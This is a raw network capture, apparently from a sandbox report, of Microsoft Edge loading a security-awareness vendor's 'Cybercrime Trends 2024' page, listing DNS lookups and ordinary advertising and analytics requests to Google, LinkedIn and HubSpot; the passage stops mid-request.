Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A74.125.193.147www.google.comIN A74.125.193.99www.google.comIN A74.125.193.103www.google.comIN A74.125.193.106www.google.comIN A74.125.193.104www.google.comIN A74.125.193.105
-
Remote address:8.8.8.8:53Requestwww.google.comIN A
-
Remote address:8.8.8.8:53Requestcdn.requestmetrics.comIN AResponsecdn.requestmetrics.comIN CNAMErequestmetrics.b-cdn.netrequestmetrics.b-cdn.netIN A143.244.38.136
-
Remote address:8.8.8.8:53Requestcdn.requestmetrics.comIN A
-
Remote address:8.8.8.8:53Requestbat.bing.comIN AResponsebat.bing.comIN CNAMEbat-bing-com.a-0001.a-msedge.netbat-bing-com.a-0001.a-msedge.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
Remote address:8.8.8.8:53Requestbat.bing.comIN A
-
Remote address:8.8.8.8:53Requestsnap.licdn.comIN AResponsesnap.licdn.comIN CNAMEod.linkedin.edgesuite.netod.linkedin.edgesuite.netIN CNAMEa1916.dscg2.akamai.neta1916.dscg2.akamai.netIN A88.221.134.136a1916.dscg2.akamai.netIN A88.221.135.105
-
Remote address:8.8.8.8:53Requestsnap.licdn.comIN A
-
POSThttps://www.google.com/pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747msedge.exeRemote address:74.125.193.147:443RequestPOST /pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747 HTTP/2.0
host: www.google.com
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:88.221.134.136:443RequestGET /li.lms-analytics/insight.min.js HTTP/2.0
host: snap.licdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
x-amz-server-side-encryption: AES256
accept-ranges: bytes
content-type: application/javascript;charset=utf-8
content-encoding: gzip
content-length: 647
cache-control: max-age=18973
date: Thu, 29 Feb 2024 15:32:30 GMT
vary: Accept-Encoding
x-content-type-options: nosniff
x-cdn: AKAM
-
Remote address:88.221.134.136:443RequestGET /li.lms-analytics/insight.old.min.js HTTP/2.0
host: snap.licdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
x-amz-server-side-encryption: AES256
accept-ranges: bytes
content-type: application/javascript;charset=utf-8
content-encoding: gzip
content-length: 16524
cache-control: max-age=70863
date: Thu, 29 Feb 2024 15:32:31 GMT
vary: Accept-Encoding
x-content-type-options: nosniff
x-cdn: AKAM
-
Remote address:8.8.8.8:53Requestgoogleads.g.doubleclick.netIN AResponsegoogleads.g.doubleclick.netIN A209.85.202.154googleads.g.doubleclick.netIN A209.85.202.157googleads.g.doubleclick.netIN A209.85.202.156googleads.g.doubleclick.netIN A209.85.202.155
-
Remote address:104.17.231.163:443RequestGET /fb.js HTTP/2.0
host: js.hsadspixel.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
x-amz-replication-status: COMPLETED
last-modified: Thu, 29 Feb 2024 15:04:46 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: DIA242QgKsF8012aTG.YNuqPl0gb3a1X
etag: W/"f9e7915ee9a6bca7fde1ccf4d767c3e6"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 36b04143ac1626bb30bb225fb2cccb1e.cloudfront.net (CloudFront)
x-amz-cf-pop: IAD12-P3
x-amz-cf-id: k5SDZx-0xuSP3cUBlDdY3fLh7EnChrkP7CSrtYPJEOtBnLezEs8sCA==
age: 456
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://send.hsbrowserreports.com/csp/report?resource=adsscriptloaderstatic/static-1.534/bundles/pixels-release.js&cfRay=85d1eab69b30dd03-LHR
cache-control: max-age=600
x-hs-target-asset: adsscriptloaderstatic/static-1.534/bundles/pixels-release.js
x-content-type-options: nosniff
x-hs-cache-status: HIT
x-envoy-upstream-service-time: 0
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-576f9d768-zx9hx
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-hubspot-correlation-id: a6514176-d368-40bf-8a8c-b42c3f929c12
x-request-id: a6514176-d368-40bf-8a8c-b42c3f929c12
cache-tag: staticjsapp-AdsScriptLoaderCloudflare-web-prod,staticjsapp-prod
cf-cache-status: HIT
server: cloudflare
cf-ray: 85d1f5d94b8cdc8b-LHR
content-encoding: br
-
Remote address:143.244.38.136:443RequestGET /agent/current/rm.js HTTP/2.0
host: cdn.requestmetrics.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://sosafe-awareness.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
server: BunnyCDN-UK1-886
cdn-pullzone: 1606496
cdn-uid: cd4e6a4c-6811-495a-bea9-94fbb4c46859
cdn-requestcountrycode: GB
vary: Accept-Encoding
access-control-allow-origin: *
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
age: 0
cache-control: public, max-age=1200
etag: W/"65ca5013-96e4"
last-modified: Mon, 12 Feb 2024 17:06:27 GMT
via: 1.1 varnish
permissions-policy: interest-cohort=()
x-origin-cache: HIT
strict-transport-security: max-age=31556952
x-proxy-cache: HIT
x-github-request-id: 2F74:2F500:4258BC:436F12:65CA5028
x-served-by: cache-lon4239-LON
x-cache: HIT
x-cache-hits: 1
x-timer: S1707757610.841391,VS0,VE124
x-fastly-request-id: c35acac9ac708065a483e34667a85683f847c0dd
cdn-proxyver: 1.04
cdn-requestpullsuccess: True
cdn-requestpullcode: 200
cdn-cachedat: 02/12/2024 17:06:49
cdn-edgestorageid: 886
timing-allow-origin: *
cdn-status: 200
cdn-requestid: 7f283e58ac3a132898c3f2524daed912
cdn-cache: HIT
content-encoding: br
-
GEThttps://googleads.g.doubleclick.net/pagead/viewthroughconversion/774274612/?random=1709220747456&cv=11&fst=1709220747456&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&hn=www.googleadservices.com&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&did=dMWZhNz&gdid=dMWZhNz&npa=0&us_privacy=1---&pscdl=noapi&auid=1087893979.1709220747&uaa=x86&uamb=0&uap=Windows&uapv=10.0&uaw=0&data=event%3Dgtag.config&rfmt=3&fmt=4msedge.exeRemote address:209.85.202.154:443RequestGET /pagead/viewthroughconversion/774274612/?random=1709220747456&cv=11&fst=1709220747456&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&hn=www.googleadservices.com&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&did=dMWZhNz&gdid=dMWZhNz&npa=0&us_privacy=1---&pscdl=noapi&auid=1087893979.1709220747&uaa=x86&uamb=0&uap=Windows&uapv=10.0&uaw=0&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/2.0
host: googleads.g.doubleclick.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
GEThttps://googleads.g.doubleclick.net/pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747msedge.exeRemote address:209.85.202.154:443RequestGET /pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747 HTTP/2.0
host: googleads.g.doubleclick.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Requestapps.identrust.comIN AResponseapps.identrust.comIN CNAMEidentrust.edgesuite.netidentrust.edgesuite.netIN CNAMEa1952.dscq.akamai.neta1952.dscq.akamai.netIN A96.17.179.205a1952.dscq.akamai.netIN A96.17.179.184
-
Remote address:96.17.179.205:80RequestGET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: apps.identrust.com
ResponseHTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Robots-Tag: noindex
Referrer-Policy: same-origin
Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT
ETag: "37d-6079b8c0929c0"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Thu, 29 Feb 2024 16:32:30 GMT
Date: Thu, 29 Feb 2024 15:32:30 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestjs.hs-analytics.netIN AResponsejs.hs-analytics.netIN A104.16.80.186js.hs-analytics.netIN A104.16.78.186js.hs-analytics.netIN A104.16.76.186js.hs-analytics.netIN A104.16.79.186js.hs-analytics.netIN A104.16.77.186
-
Remote address:8.8.8.8:53Requestwww.google.co.ukIN AResponsewww.google.co.ukIN A172.253.116.94
-
Remote address:8.8.8.8:53Requestwww.google.co.ukIN A
-
GEThttps://www.google.co.uk/pagead/1p-user-list/774274612/?random=1709220747456&cv=11&fst=1709218800000&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&npa=0&data=event%3Dgtag.config&fmt=3&is_vtc=1&cid=CAQSGwB7FLtq5lyiNwCkd7BXTxrl0ucmmBssg0GEvw&random=4204668073&rmt_tld=1&ipr=ymsedge.exeRemote address:172.253.116.94:443RequestGET /pagead/1p-user-list/774274612/?random=1709220747456&cv=11&fst=1709218800000&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&npa=0&data=event%3Dgtag.config&fmt=3&is_vtc=1&cid=CAQSGwB7FLtq5lyiNwCkd7BXTxrl0ucmmBssg0GEvw&random=4204668073&rmt_tld=1&ipr=y HTTP/2.0
host: www.google.co.uk
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:104.16.80.186:443RequestGET /analytics/1669385400000/8858700.js HTTP/2.0
host: js.hs-analytics.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript
x-amz-id-2: Y/O3uuSS+HILFDQpDAQDJRZYfCAoKAYG/p0WwdyLycmRidlcKkG2LLSXqGBkXpbJUdqSAn9dXDo=
x-amz-request-id: ARGYNQA2C2QWS3TG
last-modified: Tue, 27 Feb 2024 15:43:58 GMT
etag: W/"ac2327885a0a10e7da6a0b7ba3d1dee1"
x-amz-server-side-encryption: AES256
cache-control: max-age=300,public
x-amz-version-id: null
access-control-allow-credentials: false
vary: origin, Accept-Encoding
expires: Thu, 29 Feb 2024 15:37:30 GMT
x-envoy-upstream-service-time: 21
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/analytics-js-proxy-td/envoy-proxy-8555f56d-pbs6d
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-hubspot-correlation-id: 75a35c55-fbd2-4f3b-97b3-464d93e31bbe
x-request-id: 75a35c55-fbd2-4f3b-97b3-464d93e31bbe
cf-cache-status: REVALIDATED
server: cloudflare
cf-ray: 85d1f5dbe8a760ff-LHR
content-encoding: br
-
Remote address:8.8.8.8:53Request125.160.18.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request189.235.195.18.in-addr.arpaIN PTRResponse189.235.195.18.in-addr.arpaIN PTRec2-18-195-235-189eu-central-1compute amazonawscom
-
Remote address:8.8.8.8:53Request31.69.84.104.in-addr.arpaIN PTRResponse31.69.84.104.in-addr.arpaIN PTRa104-84-69-31deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request249.239.17.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request136.38.244.143.in-addr.arpaIN PTRResponse136.38.244.143.in-addr.arpaIN PTR143-244-38-136 bunnyinfranet
-
Remote address:8.8.8.8:53Request147.193.125.74.in-addr.arpaIN PTRResponse147.193.125.74.in-addr.arpaIN PTRig-in-f1471e100net147.193.125.74.in-addr.arpaIN PTRdi-in-f147�D
-
Remote address:8.8.8.8:53Request187.178.17.96.in-addr.arpaIN PTRResponse187.178.17.96.in-addr.arpaIN PTRa96-17-178-187deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request163.231.17.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request154.202.85.209.in-addr.arpaIN PTRResponse154.202.85.209.in-addr.arpaIN PTRdg-in-f1541e100net
-
Remote address:8.8.8.8:53Request136.134.221.88.in-addr.arpaIN PTRResponse136.134.221.88.in-addr.arpaIN PTRa88-221-134-136deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request205.179.17.96.in-addr.arpaIN PTRResponse205.179.17.96.in-addr.arpaIN PTRa96-17-179-205deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request94.116.253.172.in-addr.arpaIN PTRResponse94.116.253.172.in-addr.arpaIN PTRdj-in-f941e100net
-
Remote address:8.8.8.8:53Requestjs-na1.hs-scripts.comIN AResponsejs-na1.hs-scripts.comIN A104.16.187.89js-na1.hs-scripts.comIN A104.16.190.89js-na1.hs-scripts.comIN A104.16.189.89js-na1.hs-scripts.comIN A104.16.188.89js-na1.hs-scripts.comIN A104.16.191.89
-
Remote address:8.8.8.8:53Requesttrack.hubspot.comIN AResponsetrack.hubspot.comIN A104.19.154.83track.hubspot.comIN A104.19.155.83
-
Remote address:104.16.187.89:443RequestGET /8858700.js HTTP/2.0
host: js-na1.hs-scripts.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript;charset=utf-8
access-control-allow-credentials: true
access-control-allow-origin: https://sosafe-awareness.com
access-control-max-age: 3600
cf-bgj: minify
cf-polished: origSize=1452
vary: origin, Accept-Encoding
x-content-type-options: nosniff
x-hubspot-correlation-id: 3c58773d-facb-4afd-bf61-9b930f28bc7d
x-trace: 2BA8DB793159DCC2E9C701CC79A127A4419969B649000000000000000000
x-envoy-upstream-service-time: 5
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/hubapi-td/envoy-proxy-59d6fb747d-lld8t
x-evy-trace-virtual-host: all
x-request-id: 3c58773d-facb-4afd-bf61-9b930f28bc7d
cf-cache-status: HIT
age: 2176
last-modified: Thu, 29 Feb 2024 14:56:15 GMT
server: cloudflare
cf-ray: 85d1f5de2e4d6391-LHR
content-encoding: br
-
GEThttps://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748251&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0msedge.exeRemote address:104.19.154.83:443RequestGET 